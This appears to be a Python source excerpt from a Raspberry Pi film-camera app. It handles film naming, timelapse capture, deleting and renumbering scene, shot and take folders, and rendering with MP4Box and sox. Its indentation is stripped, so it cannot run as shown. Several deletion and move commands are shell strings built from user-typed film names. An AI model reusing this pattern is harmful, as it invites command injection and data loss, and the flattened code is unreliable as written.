def getfilms(filmfolder):
#get a list of films, in order of settings.p file last modified
films_sorted = []
films = next(os.walk(filmfolder))[1]
for i in films:
if os.path.isfile(filmfolder + i + '/' + 'settings.p') == True:
lastupdate = os.path.getmtime(filmfolder + i + '/' + 'settings.p')
films_sorted.append((i,lastupdate))
else:
films_sorted.append((i,0))
films_sorted = sorted(films_sorted, key=lambda tup: tup[1], reverse=True)
logger.info('*-- Films --*')
for p in films_sorted:
logger.info(p[0])
return films_sorted
#-------------Load tarina config---------------
def getconfig(camera):
version = camera.revision
home = os.path.expanduser('~')
configfile = home + '/.tarina/config.ini'
configdir = os.path.dirname(configfile)
if not os.path.isdir(configdir):
os.makedirs(configdir)
config = configparser.ConfigParser()
if config.read(configfile):
camera_model = config['SENSOR']['model']
camera_revision = config['SENSOR']['revision']
if camera_model == version:
return camera_model, camera_revision
elif version == 'imx219':
config['SENSOR']['model'] = version
config['SENSOR']['revision'] = 'standard'
with open(configfile, 'w') as f:
config.write(f)
return version, camera_revision
else:
pressed = ''
buttonpressed = ''
buttontime = time.time()
holdbutton = ''
selected = 0
header = 'What revision of ' + version + ' sensor are you using?'
menu = 'rev.C', 'rev.D', 'hq-camera'
while True:
settings = '', '', ''
writemenu(menu,settings,selected,header)
pressed, buttonpressed, buttontime, holdbutton, event, keydelay = getbutton(pressed, buttonpressed, buttontime, holdbutton)
if pressed == 'right':
if selected < (len(settings) - 1):
selected = selected + 1
elif pressed == 'left':
if selected > 0:
selected = selected - 1
elif pressed == 'middle':
camera_model = version
camera_revision = menu[selected]
config['SENSOR'] = {}
config['SENSOR']['model'] = camera_model
config['SENSOR']['revision'] = camera_revision
with open(configfile, 'w') as f:
config.write(f)
return camera_model, camera_revision
time.sleep(0.02)
#-------------Load film---------------
def loadfilm(filmname, filmfolder):
pressed = ''
buttonpressed = ''
buttontime = time.time()
holdbutton = ''
films = getfilms(filmfolder)
filmstotal = len(films[1:])
selectedfilm = 0
selected = 0
header = 'Up and down to select and load film'
menu = 'FILM:', 'BACK'
while True:
settings = films[selectedfilm][0], ''
writemenu(menu,settings,selected,header)
pressed, buttonpressed, buttontime, holdbutton, event, keydelay = getbutton(pressed, buttonpressed, buttontime, holdbutton)
if pressed == 'down':
if selectedfilm < filmstotal:
selectedfilm = selectedfilm + 1
elif pressed == 'up':
if selectedfilm > 0:
selectedfilm = selectedfilm - 1
elif pressed == 'right':
if selected < (len(settings) - 1):
selected = selected + 1
elif pressed == 'left':
if selected > 0:
selected = selected - 1
elif pressed == 'middle' and menu[selected] == 'FILM:':
filmname = films[selectedfilm][0]
return filmname
elif pressed == 'middle' and menu[selected] == 'BACK':
writemessage('Returning')
return filmname
time.sleep(0.02)
#-------------New film----------------
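# On-screen "keyboard": up/down scroll through the abc character set, right
# appends the current character, left/remove deletes the last one, middle
# confirms; the blinking cursor is simulated with the pausetime timer.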
def nameyourfilm(filmfolder, filmname, abc, newfilm):
oldfilmname = filmname
if newfilm == True:
filmname = ''
pressed = ''
buttonpressed = ''
buttontime = time.time()
holdbutton = ''
abcx = 0
helpmessage = 'Up, Down (select characters) Right (next). Middle (done), Retake (Cancel)'
cursor = '_'
blinking = True
pausetime = time.time()
while True:
if newfilm == True:
message = 'New film name: ' + filmname
else:
message = 'Edit film name: ' + filmname
writemessage(message + cursor)
vumetermessage(helpmessage)
pressed, buttonpressed, buttontime, holdbutton, event, keydelay = getbutton(pressed, buttonpressed, buttontime, holdbutton)
if event == ' ':
event = '_'
if pressed == 'down':
pausetime = time.time()
if abcx < (len(abc) - 1):
abcx = abcx + 1
cursor = abc[abcx]
elif pressed == 'up':
pausetime = time.time()
if abcx > 0:
abcx = abcx - 1
cursor = abc[abcx]
elif pressed == 'right':
pausetime = time.time()
if len(filmname) < 30:
filmname = filmname + abc[abcx]
cursor = abc[abcx]
else:
helpmessage = 'Yo, maximum characters reached bro!'
elif pressed == 'left' or pressed == 'remove':
pausetime = time.time()
if len(filmname) > 0:
filmname = filmname[:-1]
cursor = abc[abcx]
elif pressed == 'middle' or event == 10:
if len(filmname) > 0:
if abc[abcx] != '_':
filmname = filmname + abc[abcx]
try:
if filmname == oldfilmname:
return oldfilmname
elif filmname in [i[0] for i in getfilms(filmfolder)]:
helpmessage = 'this filmname is already taken! pick another name!'
else:
logger.info("New film " + filmname)
return(filmname)
except:
logger.info("New film " + filmname)
return(filmname)
elif pressed == 'retake':
return oldfilmname
elif event in abc:
pausetime = time.time()
filmname = filmname + event
if time.time() - pausetime > 0.5:
if blinking == True:
cursor = abc[abcx]
if blinking == False:
cursor = ' '
blinking = not blinking
pausetime = time.time()
time.sleep(keydelay)
#------------Timelapse--------------------------
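# Timelapse: records a short clip of 'duration' seconds every 'between'
# seconds into a timelapse/ subfolder, then concatenates the clips with
# MP4Box (and optionally merges the per-clip WAVs with sox).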
def timelapse(beeps,camera,foldername,filename,between,duration):
pressed = ''
buttonpressed = ''
buttontime = time.time()
holdbutton = ''
sound = False
selected = 0
header = 'Adjust delay in seconds between images'
menu = 'DELAY:', 'DURATION:', 'START', 'BACK'
while True:
settings = str(round(between,2)), str(round(duration,2)), '', ''
writemenu(menu,settings,selected,header)
seconds = (3600 / between) * duration
vumetermessage('1 h timelapse filming equals ' + str(round(seconds,2)) + ' second clip ')
pressed, buttonpressed, buttontime, holdbutton, event, keydelay = getbutton(pressed, buttonpressed, buttontime, holdbutton)
if pressed == 'up' and menu[selected] == 'DELAY:':
between = between + 1
elif pressed == 'down' and menu[selected] == 'DELAY:':
if between > 1:
between = between - 1
elif pressed == 'up' and menu[selected] == 'DURATION:':
duration = duration + 0.1
elif pressed == 'down' and menu[selected] == 'DURATION:':
if duration > 0.3:
duration = duration - 0.1
elif (pressed == 'up' or pressed == 'down') and menu[selected] == 'SOUND:':
sound = not sound
elif pressed == 'right':
if selected < (len(settings) - 1):
selected = selected + 1
elif pressed == 'left':
if selected > 0:
selected = selected - 1
elif pressed == 'middle':
if menu[selected] == 'START':
os.makedirs(foldername + 'timelapse')
time.sleep(0.02)
writemessage('Recording timelapse, middlebutton to stop')
n = 1
recording = False
starttime = time.time()
t = 0
files = []
while True:
t = time.time() - starttime
pressed, buttonpressed, buttontime, holdbutton, event, keydelay = getbutton(pressed, buttonpressed, buttontime, holdbutton)
vumetermessage('Timelapse lenght is now ' + str(round(n * duration,2)) + ' second clip ')
if recording == False and t > between:
if beeps > 0:
buzz(150)
camera.start_recording(foldername + 'timelapse/' + filename + '_' + str(n).zfill(3) + '.h264', format='h264', quality=26, bitrate=5000000)
if sound == True:
os.system(tarinafolder + '/alsa-utils-1.1.3/aplay/arecord -D hw:'+str(plughw)+' -f S16_LE -c '+str(channels)+' -r 44100 -vv /dev/shm/' + filename + '_' + str(n).zfill(3) + '.wav &')
files.append(foldername + 'timelapse/' + filename + '_' + str(n).zfill(3))
starttime = time.time()
recording = True
n = n + 1
t = 0
if recording == True:
writemessage('Recording timelapse ' + str(n) + ' ' + 'time:' + str(round(t,2)))
if recording == False:
writemessage('Between timelapse ' + str(n) + ' ' + 'time:' + str(round(t,2)))
if t > duration and recording == True:
if sound == True:
os.system('pkill arecord')
camera.stop_recording()
recording = False
starttime = time.time()
t = 0
if pressed == 'middle' and n > 1:
if recording == True:
os.system('pkill arecord')
camera.stop_recording()
#create thumbnail
try:
camera.capture(foldername + filename + '.jpeg', resize=(800,340), use_video_port=True)
except:
logger.warning('something wrong with camera jpeg capture')
writemessage('Compiling timelapse')
logger.info('Hold on, rendering ' + str(len(files)) + ' scenes')
#RENDER VIDEO
renderfilename = foldername + filename
n = 1
videomerge = ['MP4Box']
videomerge.append('-force-cat')
for f in files:
if sound == True:
compileshot(f)
audiotrim(foldername + 'timelapse/', filename + '_' + str(n).zfill(3), 'end')
else:
videomerge.append('-cat')
videomerge.append(f + '.h264')
n = n + 1
videomerge.append('-new')
videomerge.append(renderfilename + '.mp4')
call(videomerge, shell=False) #how to insert somekind of estimated time while it does this?
##RENDER AUDIO
if sound == True:
writemessage('Rendering sound')
audiomerge = ['sox']
#if render > 2:
# audiomerge.append(filename + '.wav')
for f in files:
audiomerge.append(f + '.wav')
audiomerge.append(renderfilename + '.wav')
call(audiomerge, shell=False)
##MAKE AUDIO SILENCE
if sound == False:
audiosilence(foldername,filename)
#cleanup
#os.system('rm -r ' + foldername + 'timelapse')
vumetermessage('timelapse done! ;)')
return renderfilename, between, duration
time.sleep(keydelay)
if menu[selected] == 'BACK':
vumetermessage('ok!')
return '', between, duration
time.sleep(keydelay)
#------------Remove-----------------------
def remove(filmfolder, filmname, scene, shot, take, sceneshotortake):
foldername = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3) + '/shot' + str(shot).zfill(3) + '/'
filename = 'take' + str(take).zfill(3)
pressed = ''
buttonpressed = ''
buttontime = time.time()
holdbutton = ''
time.sleep(0.1)
header = 'Are you sure you want to remove ' + sceneshotortake + '?'
menu = '', ''
settings = 'NO', 'YES'
selected = 0
while True:
writemenu(menu,settings,selected,header)
pressed, buttonpressed, buttontime, holdbutton, event, keydelay = getbutton(pressed, buttonpressed, buttontime, holdbutton)
if pressed == 'right':
if selected < (len(settings) - 1):
selected = selected + 1
elif pressed == 'left':
if selected > 0:
selected = selected - 1
elif pressed == 'middle':
if selected == 1:
if sceneshotortake == 'take':
os.system('rm ' + foldername + filename + '.h264')
os.system('rm ' + foldername + filename + '.mp4')
os.system('rm ' + foldername + filename + '.wav')
os.system('rm ' + foldername + filename + '.jpeg')
take = take - 1
if take == 0:
take = 1
elif sceneshotortake == 'shot' and shot > 0:
writemessage('Removing shot ' + str(shot))
foldername = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3) + '/shot' + str(shot).zfill(3) + '/'
os.system('rm -r ' + foldername)
take = counttakes(filmname, filmfolder, scene, shot)
elif sceneshotortake == 'scene':
writemessage('Removing scene ' + str(scene))
foldername = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3)
os.system('rm -r ' + foldername)
scene = countscenes(filmfolder, filmname)
shot = 1
take = 1
elif sceneshotortake == 'film':
foldername = filmfolder + filmname
os.system('rm -r ' + foldername)
return
elif selected == 0:
return
time.sleep(0.02)
#------------Remove and Organize----------------
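# organize() renumbers scene/shot/take folders so they stay contiguous after
# removals, and drops shots/scenes that ended up empty.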
def organize(filmfolder, filmname):
scenes = next(os.walk(filmfolder + filmname))[1]
for i in scenes:
if 'scene' not in i:
scenes.remove(i)
# Takes
for i in sorted(scenes):
shots = next(os.walk(filmfolder + filmname + '/' + i))[1]
for p in sorted(shots):
takes = next(os.walk(filmfolder + filmname + '/' + i + '/' + p))[2]
if len(takes) == 0:
logger.info('no takes in this shot, removing shot..')
os.system('rm -r ' + filmfolder + filmname + '/' + i + '/' + p)
organized_nr = 1
for s in sorted(takes):
if '.mp4' in s or '.h264' in s:
#print(s)
unorganized_nr = int(s[4:7])
takename = filmfolder + filmname + '/' + i + '/' + p + '/take' + str(unorganized_nr).zfill(3)
if organized_nr == unorganized_nr:
#print('correct')
pass
if organized_nr != unorganized_nr:
#print('false, correcting from ' + str(unorganized_nr) + ' to ' + str(organized_nr))
mv = 'mv ' + filmfolder + filmname + '/' + i + '/' + p + '/take' + str(unorganized_nr).zfill(3)
run_command(mv + '.mp4 ' + filmfolder + filmname + '/' + i + '/' + p + '/take' + str(organized_nr).zfill(3) + '.mp4')
run_command(mv + '.h264 ' + filmfolder + filmname + '/' + i + '/' + p + '/take' + str(organized_nr).zfill(3) + '.h264')
run_command(mv + '.wav ' + filmfolder + filmname + '/' + i + '/' + p + '/take' + str(organized_nr).zfill(3) + '.wav')
run_command(mv + '.jpeg ' + filmfolder + filmname + '/' + i + '/' + p + '/take' + str(organized_nr).zfill(3) + '.jpeg')
#check if same video has both h246 and mp4 and render and remove h264
duplicate = ''
if '.mp4' in s:
duplicate = s.strip('.mp4')
if duplicate == s.strip('.h264'):
logger.info('Found both mp4 and h264 of same video!')
compileshot(takename)
else:
organized_nr += 1
# Shots
for i in sorted(scenes):
shots = next(os.walk(filmfolder + filmname + '/' + i))[1]
if len(shots) == 0:
logger.info('no shots in this scene, removing scene..')
os.system('rm -r ' + filmfolder + filmname + '/' + i)
organized_nr = 1
for p in sorted(shots):
if 'insert' in p:
#add_organize(filmfolder, filmname)
pass
elif 'shot' in p:
#print(p)
unorganized_nr = int(p[-3:])
if organized_nr == unorganized_nr:
#print('correct')
pass
if organized_nr != unorganized_nr:
#print('false, correcting from ' + str(unorganized_nr) + ' to ' + str(organized_nr))
os.system('mv ' + filmfolder + filmname + '/' + i + '/shot' + str(unorganized_nr).zfill(3) + ' ' + filmfolder + filmname + '/' + i + '/shot' + str(organized_nr).zfill(3))
organized_nr += 1
# Scenes
organized_nr = 1
for i in sorted(scenes):
if 'insert' in i:
#add_organize(filmfolder, filmname)
pass
elif 'scene' in i:
#print(i)
unorganized_nr = int(i[-3:])
if organized_nr == unorganized_nr:
#print('correct')
pass
if organized_nr != unorganized_nr:
#print('false, correcting from ' + str(unorganized_nr) + ' to ' + str(organized_nr))
os.system('mv ' + filmfolder + filmname + '/scene' + str(unorganized_nr).zfill(3) + ' ' + filmfolder + filmname + '/scene' + str(organized_nr).zfill(3))
organized_nr += 1
logger.info('Organizer done! Everything is tidy')
return
#------------Add and Organize----------------
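# add_organize() makes room for folders suffixed _yanked or _insert by
# shifting existing shot/scene numbers upwards, iterating in reverse (with
# mv -n) so nothing is overwritten.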
def add_organize(filmfolder, filmname):
scenes = next(os.walk(filmfolder + filmname))[1]
for i in scenes:
if 'scene' not in i:
scenes.remove(i)
# Shots
for i in sorted(scenes):
shots = next(os.walk(filmfolder + filmname + '/' + i))[1]
for c in shots:
if 'shot' not in c:
shots.remove(c)
organized_nr = len(shots)
for p in sorted(shots, reverse=True):
if 'yanked' in p:
#print(p)
os.system('mv -n ' + filmfolder + filmname + '/' + i + '/shot' + str(organized_nr - 1).zfill(3) + '_yanked ' + filmfolder + filmname + '/' + i + '/shot' + str(organized_nr).zfill(3))
elif 'insert' in p:
os.system('mv -n ' + filmfolder + filmname + '/' + i + '/shot' + str(organized_nr - 1).zfill(3) + '_insert ' + filmfolder + filmname + '/' + i + '/shot' + str(organized_nr).zfill(3))
run_command('touch ' + filmfolder + filmname + '/' + i + '/shot' + str(organized_nr).zfill(3) + '/.placeholder')
elif 'shot' in p:
#print(p)
unorganized_nr = int(p[-3:])
if organized_nr == unorganized_nr:
#print('correct')
pass
if organized_nr != unorganized_nr:
#print('false, correcting from ' + str(unorganized_nr) + ' to ' + str(organized_nr))
os.system('mv -n ' + filmfolder + filmname + '/' + i + '/shot' + str(unorganized_nr).zfill(3) + ' ' + filmfolder + filmname + '/' + i + '/shot' + str(organized_nr).zfill(3))
organized_nr -= 1
# Scenes
organized_nr = len(scenes)
for i in sorted(scenes, reverse=True):
#print(i)
if 'yanked' in i:
os.system('mv -n ' + filmfolder + filmname + '/scene' + str(organized_nr - 1).zfill(3) + '_yanked ' + filmfolder + filmname + '/scene' + str(organized_nr).zfill(3))
elif 'insert' in i:
#print(p)
os.system('mv -n ' + filmfolder + filmname + '/scene' + str(organized_nr - 1).zfill(3) + '_insert ' + filmfolder + filmname + '/scene' + str(organized_nr).zfill(3))
run_command('touch ' + filmfolder + filmname + '/scene' + str(organized_nr).zfill(3) + '/.placeholder')
elif 'scene' in i:
#print(i)
unorganized_nr = int(i[-3:])
if organized_nr == unorganized_nr:
#print('correct')
pass
if organized_nr != unorganized_nr:
#print('false, correcting from ' + str(unorganized_nr) + ' to ' + str(organized_nr))
os.system('mv -n ' + filmfolder + filmname + '/scene' + str(unorganized_nr).zfill(3) + ' ' + filmfolder + filmname + '/scene' + str(organized_nr).zfill(3))
organized_nr -= 1
return
#-------------Compile Shot--------------
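# Wraps a raw .h264 recording into an .mp4 container with MP4Box at 25 fps,
# trims the matching audio, then deletes the original .h264.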
def compileshot(filename):
#Check if file already converted
if os.path.isfile(filename + '.h264'):
logger.info('Video not converted!')
writemessage('Converting to playable video')
#remove old mp4
os.system('rm ' + filename + '.mp4')
run_command('MP4Box -fps 25 -add ' + filename + '.h264 ' + filename + '.mp4')
delayerr = audiotrim(filename, 'end')
os.system('rm ' + filename + '.h264')
#run_command('omxplayer --layer 3 ' + filmfolder + '/.rendered/' + filename + '.mp4 &')
#time.sleep(0.8)
#run_command('aplay ' + foldername + filename + '.wav')
#-------------Get shot files--------------
def shotfiles(filmfolder, filmname, scene):
files = []
shots = countshots(filmname,filmfolder,scene)
shot = 1
while shot <= shots:
takes = counttakes(filmname,filmfolder,scene,shot)
if takes > 0:
folder = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3) + '/shot' + str(shot).zfill(3) + '/'
filename = 'take' + str(takes).zfill(3)
files.append(folder + filename)
shot = shot + 1
#writemessage(str(len(shotfiles)))
#time.sleep(2)
return files
#---------------Render Video------------------
def rendervideo(filmfiles, filename, renderinfo):
if len(filmfiles) < 1:
writemessage('Nothing here!')
time.sleep(2)
return None
print('Rendering videofiles')
writemessage('Hold on, rendering ' + renderinfo + ' with ' + str(len(filmfiles)) + ' files')
videosize = 0
rendersize = 0
videomerge = ['MP4Box']
videomerge.append('-force-cat')
for f in filmfiles[:]:
videosize = videosize + countsize(f + '.mp4')
videomerge.append('-cat')
videomerge.append(f + '.mp4')
videomerge.append('-new')
videomerge.append(filename + '.mp4')
#videomerge.append(filename + '.h264')
#call(videomerge, shell=True) #how to insert somekind of estimated time while it does this?
p = Popen(videomerge)
#show progress
while p.poll() is None:
time.sleep(0.1)
try:
rendersize = countsize(filename + '.mp4')
except:
continue
writemessage('video rendering ' + str(int(rendersize)) + ' of ' + str(int(videosize)) + ' kb done')
print('Video rendered!')
return
#---------------Render Audio----------------
def renderaudio(audiofiles, filename, dubfiles, dubmix):
#if len(audiofiles) < 1:
# writemessage('Nothing here!')
# time.sleep(2)
# return None
print('Rendering audiofiles')
##PASTE AUDIO TOGETHER
writemessage('Hold on, rendering audio...')
audiomerge = ['sox']
#if render > 2:
# audiomerge.append(filename + '.wav')
for f in audiofiles:
audiomerge.append(f + '.wav')
audiomerge.append(filename + '.wav')
call(audiomerge, shell=False)
#DUBBING
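# Each dubmix entry appears to hold (dub gain, original-mix gain, fade-in
# seconds, fade-out seconds): the dub track is faded with sox, then mixed
# over the rendered audio at those levels and trimmed to the original length.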
p = 1
for i, d in zip(dubmix, dubfiles):
writemessage('Dub ' + str(p) + ' audio found lets mix...')
pipe = subprocess.check_output('soxi -D ' + filename + '.wav', shell=True)
audiolenght = pipe.decode()
os.system('cp ' + filename + '.wav ' + filename + '_tmp.wav')
#Fade
run_command('sox -V0 -G ' + d + ' /dev/shm/fade.wav fade ' + str(round(i[2],1)) + ' 0 ' + str(round(i[3],1)))
run_command('sox -V0 -G -m -v ' + str(round(i[0],1)) + ' /dev/shm/fade.wav -v ' + str(round(i[1],1)) + ' ' + filename + '_tmp.wav ' + filename + '.wav trim 0 ' + audiolenght)
os.remove(filename + '_tmp.wav')
os.remove('/dev/shm/fade.wav')
print('Dub mix ' + str(p) + ' done!')
p += 1
return
#-------------Get scene files--------------
def scenefiles(filmfolder, filmname):
files = []
scenes = countscenes(filmfolder,filmname)
scene = 1
while scene <= scenes:
folder = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3) + '/'
filename = 'scene'
files.append(folder + filename)
scene = scene + 1
#writemessage(str(len(shotfiles)))
#time.sleep(2)
return files
#-------------Render Scene-------------
def renderscene(filmfolder, filmname, scene):
#This function checks and calls rendervideo & renderaudio if something has changed in the film
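# Change detection is a cheap content "hash": the file sizes of the clips
# involved (plus dub tracks for audio) are concatenated and compared with the
# value cached in .videohash / .audiohash; re-rendering only happens on change.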
#Video
videohash = ''
oldvideohash = ''
filmfiles = shotfiles(filmfolder, filmname, scene)
renderfilename = filmfolder + filmname + '/scene' + str(scene).zfill(3) + '/scene'
scenedir = filmfolder + filmname + '/scene' + str(scene).zfill(3) + '/'
# Check if video corrupt
renderfix = False
try:
pipe = subprocess.check_output('mediainfo --Inform="Video;%Duration%" ' + renderfilename + '.mp4', shell=True)
videolenght = pipe.decode().strip()
except:
videolenght = ''
print('Scene lenght ' + videolenght)
if videolenght == '':
print('Okey, scene file not found or is corrupted')
# For backwards compatibility remove old rendered scene files
run_command('rm ' + renderfilename + '*')
renderfix = True
# Video Hash
for p in filmfiles:
compileshot(p)
videohash = videohash + str(int(countsize(p + '.mp4')))
print('Videohash of scene is: ' + videohash)
try:
with open(scenedir + '.videohash', 'r') as f:
oldvideohash = f.readline().strip()
print('oldvideohash is: ' + oldvideohash)
except:
print('no videohash found, making one...')
with open(scenedir + '.videohash', 'w') as f:
f.write(videohash)
# Render if needed
if videohash != oldvideohash or renderfix == True:
rendervideo(filmfiles, renderfilename, 'scene ' + str(scene))
print('updating videohash...')
with open(scenedir + '.videohash', 'w') as f:
f.write(videohash)
#Audio
audiohash = ''
oldaudiohash = ''
newaudiomix = False
for p in filmfiles:
audiohash += str(int(countsize(p + '.wav')))
dubfiles, dubmix, newmix = getdubs(filmfolder, filmname, scene)
for p in dubfiles:
audiohash += str(int(countsize(p)))
print('Audiohash of scene is: ' + audiohash)
try:
with open(scenedir + '.audiohash', 'r') as f:
oldaudiohash = f.readline().strip()
print('oldaudiohash is: ' + oldaudiohash)
except:
print('no audiohash found, making one...')
with open(scenedir + '.audiohash', 'w') as f:
f.write(audiohash)
if audiohash != oldaudiohash or newmix == True or renderfix == True:
renderaudio(filmfiles, renderfilename, dubfiles, dubmix)
print('updating audiohash...')
with open(scenedir + '.audiohash', 'w') as f:
f.write(audiohash)
for i in range(len(dubfiles)):
os.system('cp ' + scenedir + '/dub/.settings' + str(i + 1).zfill(3) + ' ' + scenedir + '/dub/.rendered' + str(i + 1).zfill(3))
print('Audio rendered!')
newaudiomix = True
else:
print('Already rendered!')
return renderfilename, newaudiomix
#-------------Render film------------
def renderfilm(filmfolder, filmname, comp, scene, muxing):
def render(q, filmfolder, filmname, comp, scene):
newaudiomix = False
#This function checks and calls renderscene first then rendervideo & renderaudio if something has changed in the film
if scene > 0:
scenefilename, audiomix = renderscene(filmfolder, filmname, scene)
q.put(scenefilename)
return
scenes = countscenes(filmfolder, filmname)
for i in range(scenes):
scenefilename, audiomix = renderscene(filmfolder, filmname, i + 1)
#Check if a scene has a new audiomix
print('audiomix of scene ' + str(i + 1) + ' is ' + str(audiomix))
if audiomix == True:
newaudiomix = True
filmfiles = scenefiles(filmfolder, filmname)
#Video
videohash = ''
oldvideohash = ''
renderfilename = filmfolder + filmname + '/' + filmname
filmdir = filmfolder + filmname + '/'
for p in filmfiles:
print(p)
compileshot(p)
videohash += str(int(countsize(p + '.mp4')))
print('Videohash of film is: ' + videohash)
try:
with open(filmdir + '.videohash', 'r') as f:
oldvideohash = f.readline().strip()
print('oldvideohash is: ' + oldvideohash)
except:
print('no videohash found, making one...')
with open(filmdir + '.videohash', 'w') as f:
f.write(videohash)
if videohash != oldvideohash:
rendervideo(filmfiles, renderfilename, filmname)
print('updating video hash')
with open(filmdir + '.videohash', 'w') as f:
f.write(videohash)
#Audio
audiohash = ''
oldaudiohash = ''
for p in filmfiles:
print(p)
audiohash += str(int(countsize(p + '.wav')))
dubfiles, dubmix, newmix = getdubs(filmfolder, filmname, '')
for p in dubfiles:
audiohash += str(int(countsize(p)))
print('Audiohash of film is: ' + audiohash)
try:
with open(filmdir + '.audiohash', 'r') as f:
oldaudiohash = f.readline().strip()
print('oldaudiohash is: ' + oldaudiohash)
except:
print('no audiohash found, making one...')
with open(filmdir+ '.audiohash', 'w') as f:
f.write(audiohash)
#This is if the scene has a new audiomix
if newaudiomix == True:
newmix = True
if audiohash != oldaudiohash or newmix == True:
renderaudio(filmfiles, renderfilename, dubfiles, dubmix)
print('updating audiohash...')
with open(filmdir+ '.audiohash', 'w') as f:
f.write(audiohash)
for i in range(len(dubfiles)):
os.system('cp ' + filmdir + '/dub/.settings' + str(i + 1).zfill(3) + ' ' + filmdir + '/dub/.rendered' + str(i + 1).zfill(3))
print('Audio rendered!')
#compressing
if comp > 0:
writemessage('compressing audio')
os.system('mv ' + renderfilename + '.wav ' + renderfilename + '_tmp.wav')
run_command('sox ' + renderfilename + '_tmp.wav ' + renderfilename + '.wav compand 0.3,1 6:-70,-60,-20 -5 -90 0.2')
os.remove(renderfilename + '_tmp.wav')
if muxing == True:
#muxing mp3 layer to mp4 file
#count estimated audio filesize with a bitrate of 320 kb/s
audiosize = countsize(renderfilename + '.wav') * 0.453
os.system('mv ' + renderfilename + '.mp4 ' + renderfilename + '_tmp.mp4')
if debianversion == 'stretch':
p = Popen(['avconv', '-y', '-i', renderfilename + '.wav', '-acodec', 'libmp3lame', '-b:a', '320k', renderfilename + '.mp3'])
else:
p = Popen(['ffmpeg', '-y', '-i', renderfilename + '.wav', '-acodec', 'libmp3lame', '-b:a', '320k', renderfilename + '.mp3'])
while p.poll() is None:
time.sleep(0.2)
try:
rendersize = countsize(renderfilename + '.mp3')
except:
continue
writemessage('audio rendering ' + str(int(rendersize)) + ' of ' + str(int(audiosize)) + ' kb done')
##MERGE AUDIO & VIDEO
writemessage('Merging audio & video')
#os.remove(renderfilename + '.mp4')
call(['MP4Box', '-rem', '2', renderfilename + '_tmp.mp4'], shell=False)
call(['MP4Box', '-add', renderfilename + '_tmp.mp4', '-add', renderfilename + '.mp3', '-new', renderfilename + '.mp4'], shell=False)
os.remove(renderfilename + '_tmp.mp4')
os.remove(renderfilename + '.mp3')
else:
print('Already rendered!')
q.put(renderfilename)
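# The render itself runs in a separate process so the UI loop below stays responsive:
# the child puts the resulting filename on the queue when it is done, while the parent
# polls is_alive() and the middle button so the user can cancel (terminating the child
# and killing any MP4Box it may have spawned).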
q = mp.Queue()
proc = mp.Process(target=render, args=(q,filmfolder,filmname,comp,scene))
proc.start()
procdone = False
status = ''
vumetermessage('press middlebutton to cancel')
while True:
if proc.is_alive() == False and procdone == False:
status = q.get()
print(status)
procdone = True
proc.join()
renderfilename = status
vumetermessage('')
break
if middlebutton() == True:
proc.terminate()
proc.join()
procdone = True
os.system('pkill MP4Box')
vumetermessage('canceled for now, maybe you want to render later ;)')
renderfilename = ''
break
return renderfilename
#-------------Get dub files-----------
def getdubs(filmfolder, filmname, scene):
#search for dub files
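# Layout assumed by this function (inferred from the code below): dub audio lives in
# <film>/dub/ or <film>/sceneNNN/dub/ as dubNNN.wav, with two hidden companions per dub:
#   .settingsNNN - four floats, one per line (apparently dub level, original level,
#                  fade-in seconds, fade-out seconds; defaults 1.0 1.0 0.0 0.0)
#   .renderedNNN - a copy of the settings used for the last render
# When .settingsNNN differs from .renderedNNN the mix has changed and rerender is set.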
print('getting scene dubs')
dubfiles = []
dubmix = []
rerender = False
if scene:
filefolder = filmfolder + filmname + '/scene' + str(scene).zfill(3) + '/dub/'
else:
filefolder = filmfolder + filmname + '/dub/'
try:
allfiles = os.listdir(filefolder)
except:
print('no dubs')
return dubfiles, dubmix, rerender
for a in allfiles:
if 'dub' in a:
print('Dub audio found! ' + filefolder + a)
dubfiles.append(filefolder + a)
#check if dub mix has changed
dubnr = 1
for i in dubfiles:
dub = []
rendered_dub = []
try:
with open(filefolder + '.settings' + str(dubnr).zfill(3), 'r') as f:
dubstr = f.read().splitlines()
for i in dubstr:
dub.append(float(i))
print('dub ' + str(dubnr).zfill(3) + ' loaded!')
print(dub)
except:
print('cant find settings file')
dub = [1.0, 1.0, 0.0, 0.0]
with open(filefolder + ".settings" + str(dubnr).zfill(3), "w") as f:
for i in dub:
f.write(str(i) + '\n')
try:
with open(filefolder + '.rendered' + str(dubnr).zfill(3), 'r') as f:
dubstr = f.read().splitlines()
for i in dubstr:
rendered_dub.append(float(i))
print('rendered dub loaded')
print(rendered_dub)
except:
print('no rendered dubmix found!')
if rendered_dub != dub:
rerender = True
dubmix.append(dub)
dubnr += 1
return dubfiles, dubmix, rerender
#------------Remove Dubs----------------
def removedub(dubfolder, dubnr):
pressed = ''
buttonpressed = ''
buttontime = time.time()
holdbutton = ''
selected = 0
header = 'Are you sure you want to remove dub ' + str(dubnr) + '?'
menu = 'NO', 'YES'
settings = '', ''
while True:
writemenu(menu,settings,selected,header)
pressed, buttonpressed, buttontime, holdbutton, event, keydelay = getbutton(pressed, buttonpressed, buttontime, holdbutton)
if pressed == 'right':
if selected < (len(menu) - 1):
selected = selected + 1
elif pressed == 'left':
if selected > 0:
selected = selected - 1
elif pressed == 'middle' and selected == 0:
logger.info("don't remove dub")
time.sleep(0.3)
break
elif pressed == 'middle' and selected == 1:
os.system('rm ' + dubfolder + 'dub' + str(dubnr).zfill(3) + '.wav')
os.system('rm ' + dubfolder + '.settings' + str(dubnr).zfill(3))
os.system('rm ' + dubfolder + '.rendered' + str(dubnr).zfill(3))
time.sleep(0.5)
print(dubfolder)
dubs = next(os.walk(dubfolder))[2]
print(dubs)
for i in list(dubs):
if 'dub' not in i:
dubs.remove(i)
organized_nr = 1
for s in sorted(dubs):
if '.wav' in s:
print(s)
unorganized_nr = int(s[3:-4])
if organized_nr == unorganized_nr:
print('correct')
pass
if organized_nr != unorganized_nr:
print('false, correcting from ' + str(unorganized_nr) + ' to ' + str(organized_nr))
run_command('mv ' + dubfolder + 'dub' + str(unorganized_nr).zfill(3) + '.wav ' + dubfolder + 'dub' + str(organized_nr).zfill(3) + '.wav')
run_command('mv ' + dubfolder + '.settings' + str(unorganized_nr).zfill(3) + ' ' + dubfolder + '.settings' + str(organized_nr).zfill(3))
run_command('mv ' + dubfolder + '.rendered' + str(unorganized_nr).zfill(3) + ' ' + dubfolder + '.rendered' + str(organized_nr).zfill(3))
organized_nr += 1
logger.info('removed dub file!')
vumetermessage('dub removed!')
break
time.sleep(0.05)
#-------------Clip settings---------------
def clipsettings(filmfolder, filmname, scene, plughw):
